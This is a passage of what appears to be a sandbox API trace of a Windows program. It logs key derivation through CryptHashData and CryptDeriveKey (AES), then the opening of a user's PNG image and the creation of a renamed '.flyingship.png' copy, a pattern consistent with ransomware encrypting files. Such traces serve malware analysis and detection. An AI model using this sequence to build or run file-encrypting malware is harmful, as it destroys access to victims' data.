lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x9bd4b0 [0190.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd4b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.114] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.115] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.118] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.118] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0190.119] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.119] CryptDestroyHash (hHash=0x90af58) returned 1 [0190.119] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0190.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\rulw.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.120] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.120] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\rulw.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0190.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.122] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.122] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x26c2, lpOverlapped=0x0) returned 1 [0190.124] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.124] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, 